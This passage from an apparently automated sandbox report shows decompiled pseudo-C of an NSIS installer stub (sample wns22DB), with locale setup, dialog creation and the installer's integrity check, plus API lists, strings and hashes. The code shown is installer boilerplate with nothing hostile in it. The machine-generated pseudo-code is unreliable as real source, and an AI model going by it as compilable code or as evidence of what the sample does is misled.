				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x470254;
				_t22 = E004067C2(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x446728;
					 *0x4d1000 = 0x30;
					 *0x4d1002 = 0x78;
					 *0x4d1004 = 0;
					E004062B6(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x446728, 0);
					__eflags =  *0x446728;
					if(__eflags == 0) {
						E004062B6(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x446728, 0);
					}
					lstrcatW(0x4d1000, _t76);
				} else {
					_t73 =  *_t22(); // executed
					E0040632F(0x4d1000, _t73 & 0x0000ffff);
				}
				E00403DAE(_t78, _t90);
				 *0x4702e0 =  *0x47025c & 0x00000020;
				 *0x4702fc = 0x10000;
				if(E00405DC5(_t90, 0x4c5000) != 0) {
					L16:
					if(E00405DC5(_t98, 0x4c5000) == 0) {
						E0040640A(_t76, 0, _t82, 0x4c5000,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x470240, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x468228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403DAE(_t78, __eflags);
							__eflags =  *0x470300;
							if( *0x470300 != 0) {
								_t33 = E00405523(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x46820c;
								if( *0x46820c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x446708, 5);
							_t39 = E00406752("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E00406752("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4681e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4681e0);
								 *0x468204 = _t87;
								RegisterClassW(0x4681e0);
							}
							_t44 = DialogBoxParamW( *0x470240,  *0x468220 + 0x00000069 & 0x0000ffff, 0, E00403E86, 0);
							E00403A28(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x470240;
						 *0x4681e4 = E00401000;
						 *0x4681f0 =  *0x470240;
						 *0x4681f4 = _t30;
						 *0x468204 = 0x40a3b4;
						if(RegisterClassW(0x4681e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x446708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x470240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4601e0;
					E004062B6(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x470298 + _t78 * 2,  *0x470298 +  *(_t82 + 0x4c) * 2, 0x4601e0, 0);
					_t63 =  *0x4601e0; // 0x45
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4601e2;
						 *((short*)(E00405CEA(0x4601e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E004063E8(0x4c5000, E00405CBD(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405D09(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                                                                                  0x00403ade
                                                                                                                                                                                                  0x00403ae7
                                                                                                                                                                                                  0x00403aee
                                                                                                                                                                                                  0x00403af0
                                                                                                                                                                                                  0x00403b04
                                                                                                                                                                                                  0x00403b16
                                                                                                                                                                                                  0x00403b1f
                                                                                                                                                                                                  0x00403b28
                                                                                                                                                                                                  0x00403b2f
                                                                                                                                                                                                  0x00403b34
                                                                                                                                                                                                  0x00403b3b
                                                                                                                                                                                                  0x00403b4e
                                                                                                                                                                                                  0x00403b4e
                                                                                                                                                                                                  0x00403b59
                                                                                                                                                                                                  0x00403af2
                                                                                                                                                                                                  0x00403af2
                                                                                                                                                                                                  0x00403afd
                                                                                                                                                                                                  0x00403afd
                                                                                                                                                                                                  0x00403b5e
                                                                                                                                                                                                  0x00403b71
                                                                                                                                                                                                  0x00403b76
                                                                                                                                                                                                  0x00403b87
                                                                                                                                                                                                  0x00403c19
                                                                                                                                                                                                  0x00403c21
                                                                                                                                                                                                  0x00403c2a
                                                                                                                                                                                                  0x00403c2a
                                                                                                                                                                                                  0x00403c40
                                                                                                                                                                                                  0x00403c46
                                                                                                                                                                                                  0x00403c54
                                                                                                                                                                                                  0x00403cd5
                                                                                                                                                                                                  0x00403cdd
                                                                                                                                                                                                  0x00403ce7
                                                                                                                                                                                                  0x00403cec
                                                                                                                                                                                                  0x00403cf2
                                                                                                                                                                                                  0x00403d7c
                                                                                                                                                                                                  0x00403d81
                                                                                                                                                                                                  0x00403d83
                                                                                                                                                                                                  0x00403d9f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403d9f
                                                                                                                                                                                                  0x00403d85
                                                                                                                                                                                                  0x00403d8b
                                                                                                                                                                                                  0x00403d93
                                                                                                                                                                                                  0x00403d93
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403d8b
                                                                                                                                                                                                  0x00403d00
                                                                                                                                                                                                  0x00403d0b
                                                                                                                                                                                                  0x00403d10
                                                                                                                                                                                                  0x00403d12
                                                                                                                                                                                                  0x00403d19
                                                                                                                                                                                                  0x00403d19
                                                                                                                                                                                                  0x00403d24
                                                                                                                                                                                                  0x00403d2c
                                                                                                                                                                                                  0x00403d2e
                                                                                                                                                                                                  0x00403d30
                                                                                                                                                                                                  0x00403d39
                                                                                                                                                                                                  0x00403d3c
                                                                                                                                                                                                  0x00403d42
                                                                                                                                                                                                  0x00403d42
                                                                                                                                                                                                  0x00403d61
                                                                                                                                                                                                  0x00403d72
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403d77
                                                                                                                                                                                                  0x00403cdf
                                                                                                                                                                                                  0x00403ce1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403c56
                                                                                                                                                                                                  0x00403c56
                                                                                                                                                                                                  0x00403c62
                                                                                                                                                                                                  0x00403c6c
                                                                                                                                                                                                  0x00403c72
                                                                                                                                                                                                  0x00403c77
                                                                                                                                                                                                  0x00403c86
                                                                                                                                                                                                  0x00403da4
                                                                                                                                                                                                  0x00403da4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403da4
                                                                                                                                                                                                  0x00403c95
                                                                                                                                                                                                  0x00403cd0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403cd0
                                                                                                                                                                                                  0x00403b8d
                                                                                                                                                                                                  0x00403b8d
                                                                                                                                                                                                  0x00403b90
                                                                                                                                                                                                  0x00403b92
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403ba0
                                                                                                                                                                                                  0x00403bb2
                                                                                                                                                                                                  0x00403bb7
                                                                                                                                                                                                  0x00403bc0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403bc6
                                                                                                                                                                                                  0x00403bc8
                                                                                                                                                                                                  0x00403bd5
                                                                                                                                                                                                  0x00403bd5
                                                                                                                                                                                                  0x00403bde
                                                                                                                                                                                                  0x00403be4
                                                                                                                                                                                                  0x00403c0c
                                                                                                                                                                                                  0x00403c14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403bf6
                                                                                                                                                                                                  0x00403bf7
                                                                                                                                                                                                  0x00403c00
                                                                                                                                                                                                  0x00403c06
                                                                                                                                                                                                  0x00403c07
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403c07
                                                                                                                                                                                                  0x00403c02
                                                                                                                                                                                                  0x00403c04
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403c04
                                                                                                                                                                                                  0x00403be4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,004D5000,746AFAA0,004C1000,00000000), ref: 00403AF2
                                                                                                                                                                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                  • lstrcatW.KERNEL32(004D1000,00446728), ref: 00403B59
                                                                                                                                                                                                  • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000,00000002,004D5000), ref: 00403BD9
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000), ref: 00403BEC
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(ExecToStack), ref: 00403BF7
                                                                                                                                                                                                  • LoadImageW.USER32 ref: 00403C40
                                                                                                                                                                                                  • RegisterClassW.USER32 ref: 00403C7D
                                                                                                                                                                                                  • SystemParametersInfoW.USER32 ref: 00403C95
                                                                                                                                                                                                  • CreateWindowExW.USER32 ref: 00403CCA
                                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                  • GetClassInfoW.USER32 ref: 00403D2C
                                                                                                                                                                                                  • GetClassInfoW.USER32 ref: 00403D39
                                                                                                                                                                                                  • RegisterClassW.USER32 ref: 00403D42
                                                                                                                                                                                                  • DialogBoxParamW.USER32 ref: 00403D61
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                  • String ID: (gD$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                  • API String ID: 606308-747326481
                                                                                                                                                                                                  • Opcode ID: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                  • Instruction ID: 53e884cc7334fa84a1d96ccc45fe83da0addadf9397a6dbc28c3941536bb6224
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E361D631200700BAD320AF669E49F2B3B6CEB8574AF00417FF945B22E2DB7D9D41866D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402F30 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 203memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 210 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 213 402f80-402f85 210->213 214 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 210->214 215 4031cf-4031d3 213->215 222 4030a8-4030b6 call 402e8e 214->222 223 402fbe-402fd5 214->223 230 403187-40318c 222->230 231 4030bc-4030bf 222->231 224 402fd7 223->224 225 402fd9-402fe6 call 403447 223->225 224->225 232 403143-40314b call 402e8e 225->232 233 402fec-402ff2 225->233 230->215 234 4030c1-4030d9 call 40345d call 403447 231->234 235 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 231->235 232->230 237 403072-403076 233->237 238 402ff4-40300c call 405e99 233->238 234->230 258 4030df-4030e5 234->258 261 403139-40313e 235->261 262 40314d-40317d call 40345d call 4031d6 235->262 242 403078-40307e call 402e8e 237->242 243 40307f-403085 237->243 238->243 256 40300e-403015 238->256 242->243 249 403087-403095 call 4068b5 243->249 250 403098-4030a2 243->250 249->250 250->222 250->223 256->243 260 403017-40301e 256->260 258->230 258->235 260->243 263 403020-403027 260->263 261->215 269 403182-403185 262->269 263->243 266 403029-403030 263->266 266->243 268 403032-403052 266->268 268->230 270 403058-40305c 268->270 269->230 271 40318e-40319f 269->271 272 403064-40306c 270->272 273 40305e-403062 270->273 275 4031a1 271->275 276 4031a7-4031ac 271->276 272->243 274 40306e-403070 272->274 273->222 273->272 274->243 275->276 277 4031ad-4031b3 276->277 277->277 278 4031b5-4031cd call 405e99 277->278 278->215
                                                                                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                                                                                  			E00402F30(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x470250 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4dd000, 0x2000);
				_t105 = E00405EDE(0x4dd000, 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E004063E8(0x4cd000, 0x4dd000);
				E004063E8(0x4e1000, E00405D09(0x4cd000));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x42a6e0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E8E(1);
					__eflags =  *0x470258;
					if( *0x470258 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406923(0x41e648);
						E00405F0D(0x41e648,  &_v560, 0x4d5000); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040345D( *0x470258 + 0x1c);
							 *0x42a6e4 = _t65;
							 *0x42a6d8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031D6(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x470254 = _t110;
								 *0x47025c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x470260 =  *0x470260 + 1;
									__eflags =  *0x470260;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x42a6d4; // 0x710ec2
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405E99(0x470280, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040345D( *0x42a6d0);
					_t77 = E00403447( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x470258) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E00403447(0x42a6e8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E8E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x470258;
						if( *0x470258 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E8E(0);
							}
							goto L19;
						}
						E00405E99( &_v40, 0x42a6e8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x42a6d0; // 0x0
						 *0x470300 =  *0x470300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x470258 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x42a6e0; // 0x2581b
						if(__eflags < 0) {
							_v8 = E004068B5(_v8, 0x42a6e8, _t106);
						}
						 *0x42a6d0 =  *0x42a6d0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                                                                                                                                                                                                  0x00402f3e
                                                                                                                                                                                                  0x00402f41
                                                                                                                                                                                                  0x00402f5b
                                                                                                                                                                                                  0x00402f60
                                                                                                                                                                                                  0x00402f73
                                                                                                                                                                                                  0x00402f78
                                                                                                                                                                                                  0x00402f7e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402f80
                                                                                                                                                                                                  0x00402f91
                                                                                                                                                                                                  0x00402fa2
                                                                                                                                                                                                  0x00402fa9
                                                                                                                                                                                                  0x00402faf
                                                                                                                                                                                                  0x00402fb1
                                                                                                                                                                                                  0x00402fb6
                                                                                                                                                                                                  0x00402fb8
                                                                                                                                                                                                  0x004030a8
                                                                                                                                                                                                  0x004030aa
                                                                                                                                                                                                  0x004030af
                                                                                                                                                                                                  0x004030b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004030bc
                                                                                                                                                                                                  0x004030bf
                                                                                                                                                                                                  0x004030eb
                                                                                                                                                                                                  0x004030f0
                                                                                                                                                                                                  0x004030fb
                                                                                                                                                                                                  0x004030fd
                                                                                                                                                                                                  0x0040310e
                                                                                                                                                                                                  0x00403129
                                                                                                                                                                                                  0x0040312f
                                                                                                                                                                                                  0x00403132
                                                                                                                                                                                                  0x00403137
                                                                                                                                                                                                  0x00403156
                                                                                                                                                                                                  0x00403166
                                                                                                                                                                                                  0x00403178
                                                                                                                                                                                                  0x0040317d
                                                                                                                                                                                                  0x00403182
                                                                                                                                                                                                  0x00403185
                                                                                                                                                                                                  0x0040318e
                                                                                                                                                                                                  0x00403192
                                                                                                                                                                                                  0x0040319a
                                                                                                                                                                                                  0x0040319f
                                                                                                                                                                                                  0x004031a1
                                                                                                                                                                                                  0x004031a1
                                                                                                                                                                                                  0x004031a1
                                                                                                                                                                                                  0x004031a9
                                                                                                                                                                                                  0x004031a9
                                                                                                                                                                                                  0x004031ac
                                                                                                                                                                                                  0x004031ad
                                                                                                                                                                                                  0x004031ad
                                                                                                                                                                                                  0x004031b0
                                                                                                                                                                                                  0x004031b2
                                                                                                                                                                                                  0x004031b2
                                                                                                                                                                                                  0x004031b2
                                                                                                                                                                                                  0x004031b5
                                                                                                                                                                                                  0x004031bc
                                                                                                                                                                                                  0x004031c8
                                                                                                                                                                                                  0x004031cd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004031cd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403185
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403139
                                                                                                                                                                                                  0x004030c7
                                                                                                                                                                                                  0x004030d2
                                                                                                                                                                                                  0x004030d7
                                                                                                                                                                                                  0x004030d9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004030e2
                                                                                                                                                                                                  0x004030e5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402fbe
                                                                                                                                                                                                  0x00402fbe
                                                                                                                                                                                                  0x00402fc3
                                                                                                                                                                                                  0x00402fc7
                                                                                                                                                                                                  0x00402fce
                                                                                                                                                                                                  0x00402fd3
                                                                                                                                                                                                  0x00402fd5
                                                                                                                                                                                                  0x00402fd7
                                                                                                                                                                                                  0x00402fd7
                                                                                                                                                                                                  0x00402fdf
                                                                                                                                                                                                  0x00402fe4
                                                                                                                                                                                                  0x00402fe6
                                                                                                                                                                                                  0x00403145
                                                                                                                                                                                                  0x00403187
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403187
                                                                                                                                                                                                  0x00402fec
                                                                                                                                                                                                  0x00402ff2
                                                                                                                                                                                                  0x00403072
                                                                                                                                                                                                  0x00403076
                                                                                                                                                                                                  0x00403079
                                                                                                                                                                                                  0x0040307e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403076
                                                                                                                                                                                                  0x00402fff
                                                                                                                                                                                                  0x00403004
                                                                                                                                                                                                  0x00403007
                                                                                                                                                                                                  0x0040300c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040300e
                                                                                                                                                                                                  0x00403015
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403017
                                                                                                                                                                                                  0x0040301e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403020
                                                                                                                                                                                                  0x00403027
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403029
                                                                                                                                                                                                  0x00403030
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403032
                                                                                                                                                                                                  0x00403038
                                                                                                                                                                                                  0x00403041
                                                                                                                                                                                                  0x00403047
                                                                                                                                                                                                  0x0040304a
                                                                                                                                                                                                  0x0040304c
                                                                                                                                                                                                  0x00403052
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403058
                                                                                                                                                                                                  0x0040305c
                                                                                                                                                                                                  0x00403064
                                                                                                                                                                                                  0x00403064
                                                                                                                                                                                                  0x00403067
                                                                                                                                                                                                  0x0040306a
                                                                                                                                                                                                  0x0040306c
                                                                                                                                                                                                  0x0040306e
                                                                                                                                                                                                  0x0040306e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040306c
                                                                                                                                                                                                  0x0040305e
                                                                                                                                                                                                  0x00403062
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040307f
                                                                                                                                                                                                  0x0040307f
                                                                                                                                                                                                  0x00403085
                                                                                                                                                                                                  0x00403095
                                                                                                                                                                                                  0x00403095
                                                                                                                                                                                                  0x00403098
                                                                                                                                                                                                  0x0040309e
                                                                                                                                                                                                  0x004030a0
                                                                                                                                                                                                  0x004030a0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402fbe

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00402F60
                                                                                                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                  • HA, xrefs: 004030F6
                                                                                                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                  • Inst, xrefs: 00403017
                                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                  • soft, xrefs: 00403020
                                                                                                                                                                                                  • Null, xrefs: 00403029
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$HA$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                  • API String ID: 2803837635-3089556289
                                                                                                                                                                                                  • Opcode ID: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                  • Instruction ID: d25a53c4d11647cbbad2ea8e7a2610e0d6e301d01d0d9af5663e5c20e349ab0e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
